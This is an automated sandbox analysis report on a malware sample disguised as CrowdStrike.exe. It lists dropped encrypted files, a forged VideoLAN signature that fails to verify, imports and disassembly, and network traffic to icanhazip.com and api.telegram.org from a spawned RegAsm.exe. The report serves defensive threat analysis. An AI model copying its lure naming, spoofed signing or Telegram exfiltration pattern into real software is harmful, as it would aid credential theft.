                                                                      Preview:...............}.......w....].....r.......]......( ..r...) .....\..B;U.~.......}......9U.......;~|...&...........}.%....=....u.............%...............}.......w.t..A.......\...............n\..B;U.~..`....}......9U...R...;~|...&...........}.%....=....u.............%...............}.......s..FD.......[..B;U.~.......}......9U.......;~|...%..............[...FD.......[.....B.}.;U.~......}..E...............V|.E.;...L%...........s..FD......s[...E....}.;.s.f.......f#......f;..E.u.....}..M.A.M.;.~..5....}......9U...'...;~|...$..............[...FD.......[.....B.}.;U.~.......}..E...............V|.E.;....$...........s..FD.......Z...E....}.;.s.f.......f#......f;..E.u.....}..M.A.M.;.~..z....}......9U...l...;~|..$$.............TZ...FD......GZ.....B.}.;U.~..3......... ...$...D..}..E...............N|;....#...V...t..F.j.PQ...KQ..........Y...,.V....+.;.w f..f;F4u.......Y..f.G.f;F6...Y.........t1.G.;F|r).~..u#.~..u.f..f;F4u..Fh..................U...B.}..U.;U...W....b....F|....}.+.;....#...E....
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):198639
                                                                      Entropy (8bit):7.998978513680246
                                                                      Encrypted:true
                                                                      SSDEEP:6144:vzwfNEj8JSw34Zhh63l2HAIFBZcAtsO+5u6nugnZ8cj:+fSw4hycjNc4AnuKZFj
                                                                      MD5:BDE527A6BC09E0CAB16631682E097EE4
                                                                      SHA1:C35C2EB3F69076C693206293EFC8BBD30D942033
                                                                      SHA-256:C84293BC09732E5CCF75A5FEF59C6D8D6A2642FD8336095D958524BF2D080831
                                                                      SHA-512:89CDA448433D5B8FC54021C056388DDD95DC2733914661D2593ACF8DE354D46575A3DC8086737EDC9DEA2F2D3A4A3224615E3C9E43DA914D73689DD385B00B43
                                                                      Malicious:false
                                                                      Preview:.Z.....j}p.....Q..<W*r.&,X`...:B'`.+.{..]...|.Z.......e..H...Ms.9....*..:7%....w.B..XF....?.3.0..<.eW.,..'..]|......)....^3iP....2.,y......P..h..m......O....k.........6.&...LA....T"....Mi...........&!...A+.......Rc.B.#...g.......0...`...2 a......w...W.S.~..8%.7Y..uI..I..5...L.#Ce~.1./....h...8?X.RD.v.{..)..wP....$P....x...x6..v.`[2K....&F........P...WJq..hRI.......O:.......h..5..?.o....,...0....OC....R....bf._..>..gY..gJ..e<.....7.MC..,n=.A\{X..*@..2."..w.?.uK./.o>./..a.......2.R.w.i.........g....y........y..X...."0:...z.5~I4...*..7.y0....y.!....Xo..X...l...bR.(E..h;.......:Z.d....(3...(.V..S..eh.6.|...vg..w....0b...k.r......H3u.~..2.E.#).M...8..X.d|.D..DxP.>.8`2t.........A..T5G...F.n....l.C_].&..G.Klz....9Y.......d*..BnN......../......&.m....^]..p^C9..m0".Q~2S.AD.O..;...W....".5m=.Jj...._....K.O(.......&N.@K.q1(.X6.R.6..f.S.......fc..$$...e..zu.?,3....?P(k......\...]B.e\.4X[.n.*...I.f...|8.l4n.....07.ii....7is.p.Fd.+.8.E#...
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):138240
                                                                      Entropy (8bit):7.998680055580348
                                                                      Encrypted:true
                                                                      SSDEEP:3072:jMCBS8lSDcMdduo7dyluWiHY3m1sNpuPB0pt5WGpHYwDNmZTPbmJ:jRo8addvdy0WKY3m2uSpLbHY2cw
                                                                      MD5:EE32DCFDEC206D28E06F8722CF70C003
                                                                      SHA1:6F2B4908FFF156A8CD158CC515BF45AB8F3C17EA
                                                                      SHA-256:471AB5DE9CEFDF6BB286EC34F9271831D7CDD5FA3D40AEBD2DBF5073716834CA
                                                                      SHA-512:17201F37506FEDDA6B8AE32EF2D1A0AE3BE1C3A50507A4B6B7E0E2F5EB1C26D5DBFD0AC9AC10B29BDD004E2B4B759CDD20281C02154E54323C7B1FC8D5338B6B
                                                                      Malicious:false
                                                                      Preview:...b..G..@.`...i..nA.w...\....&....01.c.,..i.3.0^P.!.D.......,.G.....c=...a..8X.p...g..8F.l7..s..}hE...........w.....I+..!pa...jI....Tm...x......@f.....q...;8(.~..'%}@[...B?<.....*.k....9(~?..f...b...k..5...<....[..l.\!..s.B.`. xD*.>....?.@B..$S).[...@Z."e`D...L......[...Y..)..6..]|..Q.!..M..x~a.$....X...G....f.M./8....!..Pco..)(.....jX<.cn.tu..l......:e..:..M/.Y..-Mz..RM03$l9....T u.g..d..(.?...Oe....^S..2.....f#.9r8..a..)7.*...k.N._.".]g;......z....j.|4o)......F.../xPiiLh....(...zZ.+Q.DD_......&Ji.6...HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.=.'.F...h.............v....oo.v....oo.kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.T..,P..Myn.2..t.W....V.....
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):165
                                                                      Entropy (8bit):4.321507978146012
                                                                      Encrypted:false
                                                                      SSDEEP:3:gA1JnqNCqUqt/vllpfrYZcFTS9gXeF+X32ZpAo3n:HUChqjvVg3F+X32l3
                                                                      MD5:62D8B3A646DBBA93A1849FBBB473B439
                                                                      SHA1:CB7B1793379C86539E60E91DE1D25E1F340A2792
                                                                      SHA-256:2257514DCE367D7DDA399F81559FE3212EAC73F4F6D4CF4C615907D9E80BFFEE
                                                                      SHA-512:0E9F4D97B47B189160560973BF7821CA405DD40CD3A52B1D83F09C68DBD7E6046D2D2E18CD2545DB06FFF461AE851580BF90505878C99900933D6AB6EED3ADED
                                                                      Malicious:false
                                                                      Preview:locatedflatrendsoperating..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):97280
                                                                      Entropy (8bit):7.998381010094941
                                                                      Encrypted:true
                                                                      SSDEEP:1536:5hmVSOn98WHcbP8D0poL9Bo0ZOUbhCfVqFoLdQ02hYu9fxDvcnmDbaAoxtLCCcLe:5FOn98HtioZUNCfU6q9hZfNcnoaA5foJ
                                                                      MD5:B6FE42E6BD0D9F4B87B6F73EF06A3D0B
                                                                      SHA1:8C4E998A7875FB493A80211126C89A1638F02856
                                                                      SHA-256:D1FBE283CCD1DB36BC91000CFB3694030DCC026FA1987118994B36C37E970E72
                                                                      SHA-512:02C8C5BBD59101BDAE81BD05239822794DF95BFEB3FFA1E5980A4A57385F2F8FAD102AE850ECBE5FA3C6835C352C39717E3A6A9CBF69F7D3A80DE1A470CAA4CC
                                                                      Malicious:false
                                                                      Preview:h.y./z.............z..~..~...........W...7..~...9i=E..6...7>.7..w.aD.:...N.5.m>..nz(.!.h...+D.(."(.E.M..1M.........CP.%P).B.oDV.O.;..^.s......f...:1.q......~Oz...}....k.Rk.s|"..%/.Xr..G;.........rp.....Z..=.....!.v....J........:..r......u3./.....:.1..].W...<.".I....]...x..n<9$.3....g+...PBwz.,i...~3.F...p..#.....+)F...-.....lF^#.O..4...........P:.S.93.>X.|..[/.....z..f.p.....O.BL..B...q...Zw{..H.&..7.3...pF..m.I..;.`.`Dd......-i./._.b.....b.]...7.W..'....;...dy..D.;.."......[)...]...`T*2.h..ug7..8..Rp......1...Q.(.WXiK..cL=v.../X..$./..v.@/!...........e...~.?T....F..f.d.w.n..m.@.......x.....*.CD[.4Afp+kz.......v.5.!%.8..[u.E..u....4....Y........e..._.Y..7........qzT..=.t..X...)1\1/u#d....}.bmyF.1.n$#..9.7.#QTj.....Ql.._.4.v.O.<i...72...%Qn%..I@..d...=...9j6.).[........a..@......s.3?.%6..;..x...=)o.Ge.....$bC...M..Hh..t.<..Z."uh....Ja....|Wd..p/.....g:(.k.A. sN.ob.H..g.1...5 .c..S._r-.3.y(..1 ...~.t.os........S..G...l..LR]Y#a1E
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):120832
                                                                      Entropy (8bit):7.998337056809863
                                                                      Encrypted:true
                                                                      SSDEEP:3072:u9z/1m9ybZ6UKMRUAFOMpS3pHdr+tz+65S8nK:KdkybZ67MLFTpS3Vd58TK
                                                                      MD5:61217C1ABB4088C897CD62C8FD44D87F
                                                                      SHA1:0D131CBAB21D93699B0EF307207DB7412E82B28B
                                                                      SHA-256:3621FCCF1387FC43FF51F6C6E475CC6AAE507982F52A989508667557F3B40CB0
                                                                      SHA-512:21C721C2FE805AF1847B3B1CF8D1D7046C4DFA1CE45D79583A6008FD37A483D7919E938464A5D54BAA5903561B7371D8F4E2251A18EBA1824D4832ACF132356F
                                                                      Malicious:false
                                                                      Preview:...j.. ..B..b.>.E#...a..o...".....V..!..h2.....Y.Lv.`.....P...9%...+A3..t@]c..U..3........|q....3.RG..:(.....}).-y.`...wA....(...+....l..& 48RZ...b..g......{..'....n..2......P.(.....(.+6.W....."..... $.C$....s)...r....aV.gZ.'JY,..|....:...Em.2..j..n\.O.o..lV......(...aKX..c}8...3.6..L.P@G.x......{)/1~b..f.$[...@.$EJW.Oy..YB....6$..SE.N.,#..s.e.q.H./NA..P...k...r...7..1:.Z.~e.p.L@.....J#o7)v....#.......h.LK.6.Ta.N..h..>...r..H.^~.q...;u.RO"..p.........::...|..C.r.........F..._.^^.5...l..W..O.\S(,..fAt.S"..OD..8...9....)Co.;a-nT.......J.J..[....z.YT.. ..91...#0.q.......?E......GX2$^Z&T.".tH.D.Y..\.........Hs..2w..B.6.@..\....1[..3.u.lw.S,.......1....Z bv...w..*:..m. ..B.GJ.m.z.....hVx..>.x#.Cj.^...M.......9R....%.....ox..kBr.m.I.........V.3.s......u...>L.'...O....i.HJ......t.........&......r...'s.W..,......qd+.......Y.3...9.)v.3..m....u.yH.q.o&..[%!..a.z......+.9..1.p....a.M._.}.|.l..k.Zw#j..c.............J&.mm.c.I.......\.|..
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):6.46872448520698
                                                                      Encrypted:false
                                                                      SSDEEP:768:R+S6kiT3T/QqoWBY5WK9ivg0XWYETGVrPhISqAbwGpKZrLlm/:RDYL7Q+mr9R2VgjGpSO
                                                                      MD5:E27F5F4215920D7C0DB01D3A07E32FAD
                                                                      SHA1:875040E5D6FBFBCD2F4CA0F472CEF26BBF86870A
                                                                      SHA-256:C5A836D0021A235D4FC30764DFD4A2ABB33B23CA25F4DCA4A9BA7A8423F7753E
                                                                      SHA-512:1C621A173827C9F04258AEDB3562AAFD8FA4469E87FDE03391E5CD520499FC288961AAF1EA5F97CE131C3930DA9A16C420579E676AE4173B493C44BF6FBF64CF
                                                                      Malicious:false
                                                                      Preview:....F.^[]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j..o...]...U...u..u.j..[...]...U...u..u.j..G...]...U...u..u.j..3...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j......]...U...u..u.j..k...]...U...u..u.j..W...]...U...u..u.j..C...]...U...u..u.j../...]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j......]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j.....]...U...u..u.j..{...]...U..E..M.VQ.@....PQ..P.!....u....t...N...E..F..........N...&..F.....3.^]...U..E.VW.@.....Q..P....u......N...>3._.F.....^]...U....QSV.u.W....^...t..F.....P.......v..N..I..P.....u.P..j..D$.PW.p....|$.........t..M.V..O..V....Y...u.....N...F......>_^3.[..]...U.. ......SV.u.3.W3.M..E..~....v..F..H..-P....E....v..F..H...P.............R.U.f.......N.R.U.R.1.U.I.R.U.RSP..O..P....O..P.....u*.u...._M...U.3..&.G.~.j...W
                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):2.272208790499672
                                                                      TrID:
                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:CrowdStrike.exe
                                                                      File size:6'338'272 bytes
                                                                      MD5:755c0350038daefb29b888b6f8739e81
                                                                      SHA1:5b2f56953b3c925693386cae5974251479f03928
                                                                      SHA256:4491901eff338ab52c85a77a3fbd3ce80fda738046ee3b7da7be468da5b331a3
                                                                      SHA512:fede87ea708105ea3b44680f92b97881a32235614c741e7059d8ffe356b34cbcd0c57b11464cf33f4c15af46824c0c8e8e0ef5808b5251f3acbd3d783ee60add
                                                                      SSDEEP:24576:RHA1jDC3rgrKPucdYUxVXshqWzHt0IBLzvavUXUjLzC:6NSwKPucuUxVX+zmvU4C
                                                                      TLSH:3D5623228A609C32FF225DB066F496B96EB7BD125C61CCDB0308F24527B53439D35BA7
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                                      Icon Hash:0099878e8ea0ba00
                                                                      Entrypoint:0x403883
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:true
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:5
                                                                      OS Version Minor:0
                                                                      File Version Major:5
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:5
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                      Signature Valid:false
                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                      Error Number:-2146869232
                                                                      Not Before, Not After
                                                                      • 07/06/2024 01:00:00 09/06/2027 00:59:59
                                                                      Subject Chain
                                                                      • CN=VideoLAN, O=VideoLAN, L=Paris, C=FR
                                                                      Version:3
                                                                      Thumbprint MD5:E995C628AAD797E68CAE9D6374BC8ACE
                                                                      Thumbprint SHA-1:CCF8C4F9272D8A25477AF13EC71F97A3027C7319
                                                                      Thumbprint SHA-256:13D255CB1919425FC94170917F458E0CEC043372B844B95AA70C9E6B488E1909
                                                                      Serial:09D08EBDA06BE07C815EA7AF25EF6875
                                                                      Instruction
                                                                      sub esp, 000002D4h
                                                                      push ebx
                                                                      push ebp
                                                                      push esi
                                                                      push edi
                                                                      push 00000020h
                                                                      xor ebp, ebp
                                                                      pop esi
                                                                      mov dword ptr [esp+18h], ebp
                                                                      mov dword ptr [esp+10h], 00409268h
                                                                      mov dword ptr [esp+14h], ebp
                                                                      call dword ptr [00408030h]
                                                                      push 00008001h
                                                                      call dword ptr [004080B4h]
                                                                      push ebp
                                                                      call dword ptr [004082C0h]
                                                                      push 00000008h
                                                                      mov dword ptr [00472EB8h], eax
                                                                      call 00007FD9E07F14DBh
                                                                      push ebp
                                                                      push 000002B4h
                                                                      mov dword ptr [00472DD0h], eax
                                                                      lea eax, dword ptr [esp+38h]
                                                                      push eax
                                                                      push ebp
                                                                      push 00409264h
                                                                      call dword ptr [00408184h]
                                                                      push 0040924Ch
                                                                      push 0046ADC0h
                                                                      call 00007FD9E07F11BDh
                                                                      call dword ptr [004080B0h]
                                                                      push eax
                                                                      mov edi, 004C30A0h
                                                                      push edi
                                                                      call 00007FD9E07F11ABh
                                                                      push ebp
                                                                      call dword ptr [00408134h]
                                                                      cmp word ptr [004C30A0h], 0022h
                                                                      mov dword ptr [00472DD8h], eax
                                                                      mov eax, edi
                                                                      jne 00007FD9E07EEAAAh
                                                                      push 00000022h
                                                                      pop esi
                                                                      mov eax, 004C30A2h
                                                                      push esi
                                                                      push eax
                                                                      call 00007FD9E07F0E81h
                                                                      push eax
                                                                      call dword ptr [00408260h]
                                                                      mov esi, eax
                                                                      mov dword ptr [esp+1Ch], esi
                                                                      jmp 00007FD9E07EEB33h
                                                                      push 00000020h
                                                                      pop ebx
                                                                      cmp ax, bx
                                                                      jne 00007FD9E07EEAAAh
                                                                      add esi, 02h
                                                                      cmp word ptr [esi], bx
                                                                      Programming Language:
                                                                      • [ C ] VS2008 SP1 build 30729
                                                                      • [IMP] VS2008 SP1 build 30729
                                                                      • [ C ] VS2010 SP1 build 40219
                                                                      • [RES] VS2010 SP1 build 40219
                                                                      • [LNK] VS2010 SP1 build 40219
                                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                                      • IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9b34 | 0xb4 | .rdata
                                                                      • IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf4000 | 0x205e | .rsrc
                                                                      • IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_SECURITY | 0x605b70 | 0x5b70
                                                                      • IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7a000 | 0x964 | .ndata
                                                                      • IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2d0 | .rdata
                                                                      • IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
                                                                      • IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
                                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                      • .text | 0x1000 | 0x6dae | 0x6e00 | 00499a6f70259150109c809d6aa0e6ed | False | 0.6611150568181818 | data | 6.508529563136936 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      • .rdata | 0x8000 | 0x2a62 | 0x2c00 | 07990aaa54c3bc638bb87a87f3fb13e3 | False | 0.3526278409090909 | data | 4.390535020989255 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      • .data | 0xb000 | 0x67ebc | 0x200 | 014871d9a00f0e0c8c2a7cd25606c453 | False | 0.203125 | data | 1.4308602597540492 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      • .ndata | 0x73000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      • .rsrc | 0xf4000 | 0x205e | 0x2200 | 7515af38073c4e3fcf00fa4c34ecf2f7 | False | 0.3141084558823529 | data | 4.231242615481245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      • .reloc | 0xf7000 | 0xf32 | 0x1000 | b228dcf84aaf3f38125bddf00172da8e | False | 0.5166015625 | data | 5.117664940540532 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                                      • RT_ICON | 0xf4208 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 4352 | English | United States | 0.2436247723132969
                                                                      • RT_ICON | 0xf5330 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.374113475177305
                                                                      • RT_DIALOG | 0xf5798 | 0x100 | data | English | United States | 0.5234375
                                                                      • RT_DIALOG | 0xf5898 | 0x11c | data | English | United States | 0.6056338028169014
                                                                      • RT_DIALOG | 0xf59b4 | 0x60 | data | English | United States | 0.7291666666666666
                                                                      • RT_GROUP_ICON | 0xf5a14 | 0x22 | data | English | United States | 0.9705882352941176
                                                                      • RT_VERSION | 0xf5a38 | 0x350 | data | | | 0.41509433962264153
                                                                      • RT_MANIFEST | 0xf5d88 | 0x2d6 | XML 1.0 document, ASCII text, with very long lines (726), with no line terminators | English | United States | 0.5647382920110193
DLL | Import
KERNEL32.dll | SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll | GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll | RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 21, 2024 11:14:07.499615908 CEST | 54284 | 53 | 192.168.2.4 | 1.1.1.1
Jul 21, 2024 11:14:07.509393930 CEST | 53 | 54284 | 1.1.1.1 | 192.168.2.4
Jul 21, 2024 11:14:51.242415905 CEST | 59185 | 53 | 192.168.2.4 | 1.1.1.1
Jul 21, 2024 11:14:51.250047922 CEST | 53 | 59185 | 1.1.1.1 | 192.168.2.4
Jul 21, 2024 11:15:33.508882046 CEST | 52330 | 53 | 192.168.2.4 | 1.1.1.1
Jul 21, 2024 11:15:33.946429968 CEST | 53 | 52330 | 1.1.1.1 | 192.168.2.4
Jul 21, 2024 11:17:22.250345945 CEST | 50437 | 53 | 192.168.2.4 | 1.1.1.1
Jul 21, 2024 11:17:22.257852077 CEST | 53 | 50437 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 21, 2024 11:14:07.499615908 CEST | 192.168.2.4 | 1.1.1.1 | 0x949c | Standard query (0) | XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:14:51.242415905 CEST | 192.168.2.4 | 1.1.1.1 | 0x38f8 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:15:33.508882046 CEST | 192.168.2.4 | 1.1.1.1 | 0x8a9b | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:17:22.250345945 CEST | 192.168.2.4 | 1.1.1.1 | 0x68af | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 21, 2024 11:14:07.509393930 CEST | 1.1.1.1 | 192.168.2.4 | 0x949c | Name error (3) | XLuvBdVPcngNKMPfoEAAuT.XLuvBdVPcngNKMPfoEAAuT | none | none | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:14:51.250047922 CEST | 1.1.1.1 | 192.168.2.4 | 0x38f8 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:14:51.250047922 CEST | 1.1.1.1 | 192.168.2.4 | 0x38f8 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:15:33.946429968 CEST | 1.1.1.1 | 192.168.2.4 | 0x8a9b | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:17:22.257852077 CEST | 1.1.1.1 | 192.168.2.4 | 0x68af | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Jul 21, 2024 11:17:22.257852077 CEST | 1.1.1.1 | 192.168.2.4 | 0x68af | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
• api.telegram.org
• icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49737 | 104.16.185.241 | 80 | 7904 | C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 21, 2024 11:14:51.260724068 CEST | 63 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Jul 21, 2024 11:14:51.719336987 CEST | 534 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:14:51 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=mx3YxB5m2CbBH4e_Gr2mk.zS3jO_kb8_5iwsvqaaywM-1721553291-1.0.1.1-yr6tFtJdhRZ_gyUr_vYtm5LPtlXTYIibGW1ftF4u31giE9ciKeU__uNEaQTubUSGe5v1o7DopMQQtrN_PIzQ_A; path=/; expires=Sun, 21-Jul-24 09:44:51 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 8a6a1548ee5d6a56-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 104.16.185.241 | 80 | 7904 | C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Jul 21, 2024 11:15:56.427700996 CEST | 39 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Jul 21, 2024 11:15:56.898094893 CEST | 534 | IN | HTTP/1.1 200 OK
Date: Sun, 21 Jul 2024 09:15:56 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
